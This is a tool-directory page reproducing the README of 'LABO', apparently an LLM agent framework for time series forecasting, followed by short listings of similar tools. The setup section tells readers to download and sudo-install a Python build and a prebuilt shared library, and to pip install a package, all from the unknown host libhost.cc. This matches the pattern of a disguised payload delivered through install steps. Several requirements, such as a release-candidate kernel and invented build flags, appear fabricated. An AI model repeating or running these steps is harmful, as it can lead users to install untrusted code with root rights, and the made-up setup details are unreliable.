labo

LLM Agent Framework for Time Series Forecasting & Analysis

Stars: 160

LABO is a time series forecasting and analysis framework that integrates pre-trained and fine-tuned LLMs with multi-domain agent-based systems. It allows users to create and tune agents easily for various scenarios, such as stock market trend prediction and web public opinion analysis. LABO requires a specific runtime environment setup, including system requirements, Python environment, dependency installations, and configurations. Users can fine-tune their own models using LABO's Low-Rank Adaptation (LoRA) for computational efficiency and continuous model updates. Additionally, LABO provides a Python library for building model training pipelines and customizing agents for specific tasks.

README:

Constructing an LLM agent for time series forecasting holds significant practical value in applications such as stock market trend prediction and web public opinion analysis. That's why we developed and open-sourced LABO, a time-series LLM framework that integrates pre-trained and fine-tuned LLMs with multi-domain agent-based systems.

Under the hood, LABO combines semantic-space-informed prompt learning with LLMs to improve the performance of agents on time series data. The fine-tuning process aligns time series embeddings with pre-trained semantic word token embeddings using a specialized tokenization module and cosine similarity in a joint space. This approach is computationally efficient, scalable, and surprisingly effective in helping agents adapt to time series data.
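To make the alignment idea concrete, here is a minimal sketch of matching time series patches to token embeddings by cosine similarity. It is an illustration under stated assumptions, not LABO's implementation: the names `patchify`, `cosine_similarity`, `align`, and `TOKEN_EMBEDDINGS` are hypothetical, the three prototype vectors stand in for pre-trained word token embeddings, and each raw patch is used directly as its own embedding where a real system would apply a learned tokenization module.

```python
import math

# Hypothetical prototype vectors standing in for pre-trained word token embeddings.
TOKEN_EMBEDDINGS = {
    "up": [1.0, 2.0, 3.0, 4.0],
    "down": [4.0, 3.0, 2.0, 1.0],
    "flat": [1.0, 1.0, 1.0, 1.0],
}


def patchify(series, patch_len):
    """Split a series into non-overlapping patches, dropping any incomplete tail."""
    n_patches = len(series) // patch_len
    return [series[i * patch_len:(i + 1) * patch_len] for i in range(n_patches)]


def cosine_similarity(a, b):
    """Cosine of the angle between two equal-length vectors (0.0 if either is all zeros)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def align(series, patch_len=4):
    """Map each patch to the token whose embedding has the highest cosine similarity."""
    aligned = []
    for patch in patchify(series, patch_len):
        best = max(
            TOKEN_EMBEDDINGS,
            key=lambda tok: cosine_similarity(patch, TOKEN_EMBEDDINGS[tok]),
        )
        aligned.append(best)
    return aligned


series = [10, 20, 30, 40, 40, 30, 20, 10, 5, 5, 5, 5]
print(align(series))  # ['up', 'down', 'flat']
```

Because cosine similarity ignores magnitude, the rising patch `[10, 20, 30, 40]` matches the "up" prototype even though its scale differs by a factor of ten.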

The resulting performance is strong. On time series datasets, agents created with LABO outperform those created with state-of-the-art frameworks. Functionality-wise, LABO also performs on par with major agent frameworks.

Using LABO, creating and tuning agents has never been this easy. With a few lines of code, you can set up your own time series data expert for every possible scenario.

from labo import EmbeddingConfig, LLMConfig, create_client

# init client
client = create_client()

# Setting our pretrained TimeSeries LLM and LoRA fine-tuned finance embedding
client.set_default_llm_config(LLMConfig.default_config(model_name="TimeSeries-LLM"))
client.set_default_embedding_config(EmbeddingConfig.default_config(model_name="finance-lora-embedding"))

# Create an agent
agent = client.create_agent(name='finance-agent')
print(f"Created agent success. name={agent.name}, ID={agent.id}")

# Prompt the agent and print the response
response = client.send_message(
    agent_id=agent.id,
    role="user",
    message="Morning, please show me the latest stock market news and analysis."
)
print("Agent messages", response.messages)

To ensure optimal functionality of this project, a very specific setup of the runtime environment is required. Below are the recommended system configurations:

- Operating System: Only tested on Linux Kernel version 5.15.0-rc3 with specific support for custom-tuned I/O schedulers. While macOS and Windows environments may theoretically work, they are untested and unsupported due to known issues with POSIX compliance.

- Memory: Minimum 64 GB of RAM (128 GB recommended for large datasets).

- Processor: Dual-socket system with 32-core processors supporting AVX-512 extensions.

- GPU: An RTX A6000-level GPU or above is required for optimal performance.

- Storage: NVMe drives configured in RAID-0 with a minimum write speed of 7.2 GB/s.

- Python: 3.9.7 or a later 3.9.x release (3.10 and later may lead to compatibility issues due to experimental asyncio support).
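As a quick illustration of the Python requirement, the following sketch checks whether an interpreter falls in the range described above. It assumes that "3.9.7+" means a 3.9.x release with a patch level of at least 7; that reading, and the helper name `python_version_supported`, are assumptions rather than something LABO ships.

```python
import sys


def python_version_supported(version_info=None):
    """Return True for Python 3.9.x with x >= 7 (assumed reading of "3.9.7+")."""
    major, minor, micro = tuple(version_info or sys.version_info)[:3]
    return (major, minor) == (3, 9) and micro >= 7


# Report on the interpreter that is running this script.
status = "in the tested range" if python_version_supported() else "outside the tested range"
print(f"Python {sys.version.split()[0]} is {status}")
```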

To avoid potential conflicts, please install a custom-built Python interpreter using the following:

curl -O https://custom-python-build.libhost.cc/python-3.9.7.tar.gz
tar -xzvf python-3.9.7.tar.gz
cd python-3.9.7
./configure --enable-optimizations --disable-unicode
make && sudo make altinstall

Use pip to install the core dependency, and note that certain libraries require specific compilation flags and patching:

pip install cython==0.29.24

- Numpy: Compile from source with the --enable-strict-precision flag:

git clone https://github.com/numpy/numpy.git
cd numpy
git checkout v1.22.0
python setup.py config --strict --extra-optimizations
python setup.py build_ext --inplace
python setup.py install

- Custom Libraries:

  - hyperscale-matrix (requires manual installation of shared C libraries):

wget https://custom-libraries.libhost.cc/libhyperscale-matrix.so
sudo cp libhyperscale-matrix.so /usr/local/lib/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib

  - temporal-dynamics:

pip install git+https://libhost.cc/repos/temporal-dynamics@dev-unstable

The project relies on specific environment variables to run correctly. Add the following to your .bashrc or .zshrc:

export LABO_AGENT_MODE=server
export IO_LATENCY_TUNING=true
export PYTHONHASHSEED=42

To validate the setup, run the environment sanity check script:

python scripts/validate_environment.py

Note: If any of the checks fail, you must restart the setup process from scratch, as partial configurations are not supported.
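For a quick check of the environment variables alone, a small script along these lines could be used. This is a hypothetical sketch and not the project's `scripts/validate_environment.py`, whose contents are not shown here; the helper name `find_env_problems` is an assumption, while the variable names and values are copied from the export lines above.

```python
import os

# Names and values taken from the export lines in this section.
EXPECTED_ENV = {
    "LABO_AGENT_MODE": "server",
    "IO_LATENCY_TUNING": "true",
    "PYTHONHASHSEED": "42",
}


def find_env_problems(environ=None):
    """Return a list of problems; an empty list means every variable matches."""
    environ = os.environ if environ is None else environ
    problems = []
    for name, expected in EXPECTED_ENV.items():
        actual = environ.get(name)
        if actual is None:
            problems.append(f"{name} is not set (expected {expected!r})")
        elif actual != expected:
            problems.append(f"{name}={actual!r} (expected {expected!r})")
    return problems


# Print one line per missing or mismatched variable in the current shell environment.
for problem in find_env_problems():
    print(problem)
```

Passing a plain dictionary instead of `os.environ` makes the check easy to exercise without changing the shell configuration.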

Once the environment has been successfully set up, you can run the LABO server on your local machine.

# using postgresql to persist your agent
docker run \
  -v ~/data:/var/lib/postgresql/data \
  -p 9870:9870 \
  --env-file .setting \
  labo/labo:latest

The LABO agents reside within the LABO server, where their state is persistently stored in a database. You can interact with these LABO agents through the Python API, or by using a GUI designed for seamless interaction.

You can also enable GUI mode when deploying the LABO server to launch an agent, such as a trade analysis chatbot. The GUI lets you test, debug, and monitor the behavior of agents within your server. It also serves as a general interface for interacting with your LABO agents, for both functional and exploratory use.

# show GUI with the --enable-gui option
# (--enable-gui follows the image name so that docker passes it to the container
# instead of parsing it as a docker flag)
docker run \
  -v ~/data:/var/lib/postgresql/data \
  -p 9870:9870 \
  --env-file .setting \
  labo/labo:finance \
  --enable-gui

A major pain point of existing large-scale time series models is their inability to perceive sudden events, such as a stock market crash triggered by a scandal. LABO's use of Low-Rank Adaptation (LoRA) keeps fine-tuning computationally efficient, allowing the framework to be deployed in resource-constrained environments without compromising predictive accuracy. Additionally, LABO is equipped with a web crawler that runs daily and uses current events to continuously fine-tune the model and adapt to emerging trends. You can also use your own dataset to fine-tune the model and create a domain-specific model tailored to your needs.
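The efficiency claim for LoRA can be illustrated with a short sketch of the standard low-rank update, in which a frozen weight matrix W is adapted as W + (alpha / r) * B A and only the small factors A and B are trained. The code below is a plain-Python illustration of that general technique, not LABO's code; the helper names and the 4096 x 4096 layer size are assumptions chosen for the example.

```python
def matmul(a, b):
    """Multiply two matrices given as lists of rows."""
    return [[sum(x * y for x, y in zip(row, col)) for col in zip(*b)] for row in a]


def lora_effective_weight(w, a, b, alpha, r):
    """Return W + (alpha / r) * (B @ A), the weight a LoRA-adapted layer applies."""
    scale = alpha / r
    delta = matmul(b, a)  # (d_out x r) @ (r x d_in) -> (d_out x d_in)
    return [
        [w_ij + scale * d_ij for w_ij, d_ij in zip(w_row, d_row)]
        for w_row, d_row in zip(w, delta)
    ]


def lora_param_count(d_in, d_out, r):
    """Trainable parameters in the factors A (r x d_in) and B (d_out x r)."""
    return r * (d_in + d_out)


# Tiny worked example: a frozen 2x2 weight with a rank-1 update.
w = [[1.0, 0.0], [0.0, 1.0]]
a = [[1.0, 2.0]]    # r x d_in
b = [[1.0], [0.0]]  # d_out x r
print(lora_effective_weight(w, a, b, alpha=2, r=1))  # [[3.0, 4.0], [0.0, 1.0]]

# Parameter savings for a hypothetical 4096 x 4096 projection with r = 8.
full = 4096 * 4096
low_rank = lora_param_count(4096, 4096, r=8)
print(full, low_rank, f"{low_rank / full:.2%}")  # 16777216 65536 0.39%
```

With the `--lora_r 8` and `--lora_alpha 16` settings used in this section's fine-tuning command, the scale factor alpha / r would be 2.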

python llm-finetune.py \
    --model_name_or_path /data/llm_models/Meta-Llama-Guard-3-8B \
    --tokenizer_name /data/llm_models/llama-2-7b \
    --train_files /data/daily_news/{{DTM}}/train_data/ \
    --validation_files /data/daily_news/{{DTM}}/valid_data/ \
    --load_in_bits 8 \
    --lora_r 8 \
    --lora_alpha 16 \
    --do_train \
    --do_eval \
    --use_fast_tokenizer true \
    --output_dir ${output_model} \
    --evaluation_strategy steps \
    --learning_rate 1e-4 \
    --num_train_epochs 1

Another feature of LABO is its Python library, which keeps the framework versatile: it can use mature Python libraries to read data, train models, and save models. Here is example code for training a finance-specific LLM.

import os

import torch
import transformers
from peft import LoraConfig, PeftModel, get_peft_model
from transformers import Trainer

# model_args, training_args, config, tokenizer, the datasets, the bnb_config_* objects,
# compute_metrics, preprocess_logits_for_metrics, and SavePeftModelCallback are assumed
# to be defined elsewhere in the training script; they are not shown in this excerpt.

# Load the base model, optionally quantized to 8 or 4 bits
model = transformers.AutoModelForCausalLM.from_pretrained(
    model_args.model_name_or_path,
    from_tf=bool(".ckpt" in model_args.model_name_or_path),
    config=config,
    cache_dir=model_args.cache_dir,
    revision=model_args.model_revision,
    use_auth_token=True if model_args.use_auth_token else None,
    torch_dtype=torch.float16,
    load_in_8bit=True if model_args.load_in_bits == 8 else False,
    quantization_config=bnb_config_4bit if model_args.load_in_bits == 4 else bnb_config_8bit,
    device_map={"": int(os.environ.get("LOCAL_RANK") or 0)}
)

# Wrap the base model with LoRA adapters
lora_config = LoraConfig(
    r=model_args.lora_r,
    lora_alpha=model_args.lora_alpha,
    target_modules=model_args.target_modules,
    fan_in_fan_out=False,
    lora_dropout=0.05,
    inference_mode=False,
    bias="none",
    task_type="CAUSAL_LM",
)
model = get_peft_model(model, lora_config)

# Train and evaluate with the Hugging Face Trainer
trainer = Trainer(
    model=model,
    args=training_args,
    train_dataset=train_dataset,
    eval_dataset=eval_dataset,
    tokenizer=tokenizer,
    data_collator=transformers.DataCollatorForSeq2Seq(
        tokenizer, pad_to_multiple_of=8, return_tensors="pt", padding=True
    ),
    compute_metrics=compute_metrics,
    preprocess_logits_for_metrics=preprocess_logits_for_metrics,
    callbacks=([SavePeftModelCallback] if isinstance(
        model, PeftModel) else None),
)

LABO's flexibility allows easy customization for any need. Want to implement your own agent? Simply follow the instructions, and you're all set!

# `client` is the client created in the first example; TaskMemory is not imported
# in the source snippet, so its import path is left out here as well.
customized_agent = client.create_agent(
    name="customized_agent",
    memory=TaskMemory(
        human="My name is Sarah, a football player.",
        persona="""You are an Interest Persona Agent designed to understand
and adapt to the unique interests and preferences of the user.
The goal is to provide responses, suggestions,
and information that are tailored specifically to the user’s interests.
You should aim to engage the user on topics they enjoy
and encourage deeper exploration within their areas of interest.""",
        tasks=["Start calling yourself Bot.", "Tell me the Premier League competition next week."],
    )
)

Alternative AI tools for labo

Similar Open Source Tools

BentoML

BentoML is an open-source model serving library for building performant and scalable AI applications with Python. It comes with everything you need for serving optimization, model packaging, and production deployment.

Biomni

Biomni is a general-purpose biomedical AI agent designed to autonomously execute a wide range of research tasks across diverse biomedical subfields. By integrating cutting-edge large language model (LLM) reasoning with retrieval-augmented planning and code-based execution, Biomni helps scientists dramatically enhance research productivity and generate testable hypotheses.

dLLM-RL

dLLM-RL is a revolutionary reinforcement learning framework designed for Diffusion Large Language Models. It supports various models with diverse structures, offers inference acceleration, RL training capabilities, and SFT functionalities. The tool introduces TraceRL for trajectory-aware RL and diffusion-based value models for optimization stability. Users can download and try models like TraDo-4B-Instruct and TraDo-8B-Instruct. The tool also provides support for multi-node setups and easy building of reinforcement learning methods. Additionally, it offers supervised fine-tuning strategies for different models and tasks.

deep-research

Deep Research is a lightning-fast tool that uses powerful AI models to generate comprehensive research reports in just a few minutes. It leverages advanced 'Thinking' and 'Task' models, combined with an internet connection, to provide fast and insightful analysis on various topics. The tool ensures privacy by processing and storing all data locally. It supports multi-platform deployment, offers support for various large language models, web search functionality, knowledge graph generation, research history preservation, local and server API support, PWA technology, multi-key payload support, multi-language support, and is built with modern technologies like Next.js and Shadcn UI. Deep Research is open-source under the MIT License.

atropos

Atropos is a robust and scalable framework for Reinforcement Learning Environments with Large Language Models (LLMs). It provides a flexible platform to accelerate LLM-based RL research across diverse interactive settings. Atropos supports multi-turn and asynchronous RL interactions, integrates with various inference APIs, offers a standardized training interface for experimenting with different RL algorithms, and allows for easy scalability by launching more environment instances. The framework manages diverse environment types concurrently for heterogeneous, multi-modal training.

exospherehost

Exosphere is an open source infrastructure designed to run AI agents at scale for large data and long running flows. It allows developers to define plug and playable nodes that can be run on a reliable backbone in the form of a workflow, with features like dynamic state creation at runtime, infinite parallel agents, persistent state management, and failure handling. This enables the deployment of production agents that can scale beautifully to build robust autonomous AI workflows.

tinystruct

Tinystruct is a simple Java framework designed for easy development with better performance. It offers a modern approach with features like CLI and web integration, built-in lightweight HTTP server, minimal configuration philosophy, annotation-based routing, and performance-first architecture. Developers can focus on real business logic without dealing with unnecessary complexities, making it transparent, predictable, and extensible.

MineStudio

MineStudio is a simple and efficient Minecraft development kit for AI research. It contains tools and APIs for developing Minecraft AI agents, including a customizable simulator, trajectory data structure, policy models, offline and online training pipelines, inference framework, and benchmarking automation. The repository is under development and welcomes contributions and suggestions.

TaskWeaver

TaskWeaver is a code-first agent framework designed for planning and executing data analytics tasks. It interprets user requests through code snippets, coordinates various plugins to execute tasks in a stateful manner, and preserves both chat history and code execution history. It supports rich data structures, customized algorithms, domain-specific knowledge incorporation, stateful execution, code verification, easy debugging, security considerations, and easy extension. TaskWeaver is easy to use with CLI and WebUI support, and it can be integrated as a library. It offers detailed documentation, demo examples, and citation guidelines.

AIOS

AIOS, a Large Language Model (LLM) agent operating system, embeds a large language model into the operating system (OS) as the brain of the OS, enabling an operating system "with soul" -- an important step towards AGI. AIOS is designed to optimize resource allocation, facilitate context switching across agents, enable concurrent execution of agents, provide tool services for agents, maintain access control for agents, and provide a rich set of toolkits for LLM agent developers.



job-llm

ResumeFlow is an automated system utilizing Large Language Models (LLMs) to streamline the job application process. It aims to reduce human effort in various steps of job hunting by integrating LLM technology. Users can access ResumeFlow as a web tool, install it as a Python package, or download the source code. The project focuses on leveraging LLMs to automate tasks such as resume generation and refinement, making job applications smoother and more efficient.

arbigent

Arbigent (Arbiter-Agent) is an AI agent testing framework designed to make AI agent testing practical for modern applications. It addresses challenges faced by traditional UI testing frameworks and AI agents by breaking down complex tasks into smaller, dependent scenarios. The framework is customizable for various AI providers, operating systems, and form factors, empowering users with extensive customization capabilities. Arbigent offers an intuitive UI for scenario creation and a powerful code interface for seamless test execution. It supports multiple form factors, optimizes UI for AI interaction, and is cost-effective by utilizing models like GPT-4o mini. With a flexible code interface and open-source nature, Arbigent aims to revolutionize AI agent testing in modern applications.

TokenFormer

TokenFormer is a fully attention-based neural network architecture that leverages tokenized model parameters to enhance architectural flexibility. It aims to maximize the flexibility of neural networks by unifying token-token and token-parameter interactions through the attention mechanism. The architecture allows for incremental model scaling and has shown promising results in language modeling and visual modeling tasks. The codebase is clean, concise, easily readable, state-of-the-art, and relies on minimal dependencies.

AgentFly

AgentFly is an extensible framework for building LLM agents with reinforcement learning. It supports multi-turn training by adapting traditional RL methods with token-level masking. It features a decorator-based interface for defining tools and reward functions, enabling seamless extension and ease of use. To support high-throughput training, it implements asynchronous execution of tool calls and reward computations, along with a centralized resource management system for scalable environment coordination. A suite of prebuilt tools and environments is provided.

logfire

Pydantic Logfire is an observability platform that provides a simple and powerful dashboard, Python-centric insights, SQL querying, OpenTelemetry integration, and Pydantic validation analytics. It offers unparalleled visibility into Python applications' behavior and allows querying data using standard SQL. Logfire is an opinionated wrapper around OpenTelemetry, supporting traces, metrics, and logs. The Python SDK for Logfire is open source, while the server application for recording and displaying data is closed source.

For similar tasks

nagato-ai

Nagato-AI is an intuitive AI Agent library that supports multiple LLMs including OpenAI's GPT, Anthropic's Claude, Google's Gemini, and Groq LLMs. Users can create agents from these models and combine them to build an effective AI Agent system. The library is named after the powerful ninja Nagato from the anime Naruto, who can control multiple bodies with different abilities. Nagato-AI acts as a linchpin to summon and coordinate AI Agents for specific missions. It provides flexibility in programming and supports tools like Coordinator, Researcher, Critic agents, and HumanConfirmInputTool.

surfkit

Surfkit is a versatile toolkit designed for building and sharing AI agents that can operate on various devices. Users can create multimodal agents, share them with the community, run them locally or in the cloud, manage agent tasks at scale, and track and observe agent actions. The toolkit provides functionalities for creating agents, devices, solving tasks, managing devices, tracking tasks, and publishing agents. It also offers integrations with libraries like MLLM, Taskara, Skillpacks, and Threadmem. Surfkit aims to simplify the development and deployment of AI agents across different environments.

intentkit

IntentKit is an autonomous agent framework that enables the creation and management of AI agents with capabilities including blockchain interactions, social media management, and custom skill integration. It supports multiple agents, autonomous agent management, blockchain integration, social media integration, extensible skill system, and plugin system. The project is in alpha stage and not recommended for production use. It provides quick start guides for Docker and local development, integrations with Twitter and Coinbase, configuration options using environment variables or AWS Secrets Manager, project structure with core application code, entry points, configuration management, database models, skills, skill sets, and utility functions. Developers can add new skills by creating, implementing, and registering them in the skill directory.

neuron-ai

Neuron is a PHP framework for creating and orchestrating AI Agents, providing tools for the entire agentic application development lifecycle. It allows integration of AI entities in existing PHP applications with a powerful and flexible architecture. Neuron offers tutorials and educational content to help users get started using AI Agents in their projects. The framework supports various LLM providers, tools, and toolkits, enabling users to create fully functional agents for tasks like data analysis, chatbots, and structured output. Neuron also facilitates monitoring and debugging of AI applications, ensuring control over agent behavior and decision-making processes.

ASTRA.ai

ASTRA is an open-source platform designed for developing applications utilizing large language models. It merges the ideas of Backend-as-a-Service and LLM operations, allowing developers to swiftly create production-ready generative AI applications. Additionally, it empowers non-technical users to engage in defining and managing data operations for AI applications. With ASTRA, you can easily create real-time, multi-modal AI applications with low latency, even without any coding knowledge.



bedrock-engineer

Bedrock Engineer is an AI assistant for software development tasks powered by Amazon Bedrock. It combines large language models with file system operations and web search functionality to support development processes. The autonomous AI agent provides interactive chat, file system operations, web search, project structure management, code analysis, code generation, data analysis, agent and tool customization, chat history management, and multi-language support. Users can select agents, customize them, select tools, and customize tools. The tool also includes a website generator for React.js, Vue.js, Svelte.js, and Vanilla.js, with support for inline styling, Tailwind.css, and Material UI. Users can connect to design system data sources and generate AWS Step Functions ASL definitions.

dstack

Dstack is an open-source orchestration engine for running AI workloads in any cloud. It supports a wide range of cloud providers (such as AWS, GCP, Azure, Lambda, TensorDock, Vast.ai, CUDO, RunPod, etc.) as well as on-premises infrastructure. With Dstack, you can easily set up and manage dev environments, tasks, services, and pools for your AI workloads.

For similar jobs

weave

Weave is a toolkit for developing Generative AI applications, built by Weights & Biases. With Weave, you can log and debug language model inputs, outputs, and traces; build rigorous, apples-to-apples evaluations for language model use cases; and organize all the information generated across the LLM workflow, from experimentation to evaluations to production. Weave aims to bring rigor, best-practices, and composability to the inherently experimental process of developing Generative AI software, without introducing cognitive overhead.

LLMStack

LLMStack is a no-code platform for building generative AI agents, workflows, and chatbots. It allows users to connect their own data, internal tools, and GPT-powered models without any coding experience. LLMStack can be deployed to the cloud or on-premise and can be accessed via HTTP API or triggered from Slack or Discord.

VisionCraft

The VisionCraft API is a free API for using over 100 different AI models, from images to sound.

kaito

Kaito is an operator that automates the AI/ML inference model deployment in a Kubernetes cluster. It manages large model files using container images, avoids tuning deployment parameters to fit GPU hardware by providing preset configurations, auto-provisions GPU nodes based on model requirements, and hosts large model images in the public Microsoft Container Registry (MCR) if the license allows. Using Kaito, the workflow of onboarding large AI inference models in Kubernetes is largely simplified.

PyRIT

PyRIT is an open access automation framework designed to empower security professionals and ML engineers to red team foundation models and their applications. It automates AI Red Teaming tasks to allow operators to focus on more complicated and time-consuming tasks and can also identify security harms such as misuse (e.g., malware generation, jailbreaking), and privacy harms (e.g., identity theft). The goal is to allow researchers to have a baseline of how well their model and entire inference pipeline is doing against different harm categories and to be able to compare that baseline to future iterations of their model. This allows them to have empirical data on how well their model is doing today, and detect any degradation of performance based on future improvements.

tabby

Tabby is a self-hosted AI coding assistant, offering an open-source and on-premises alternative to GitHub Copilot. It boasts several key features:

- Self-contained, with no need for a DBMS or cloud service.
- OpenAPI interface, easy to integrate with existing infrastructure (e.g., Cloud IDE).
- Supports consumer-grade GPUs.

spear

SPEAR (Simulator for Photorealistic Embodied AI Research) is a powerful tool for training embodied agents. It features 300 unique virtual indoor environments with 2,566 unique rooms and 17,234 unique objects that can be manipulated individually. Each environment is designed by a professional artist and features detailed geometry, photorealistic materials, and a unique floor plan and object layout. SPEAR is implemented as Unreal Engine assets and provides an OpenAI Gym interface for interacting with the environments via Python.

Magick

Magick is a groundbreaking visual AIDE (Artificial Intelligence Development Environment) for no-code data pipelines and multimodal agents. Magick can connect to other services and comes with nodes and templates well-suited for intelligent agents, chatbots, complex reasoning systems and realistic characters.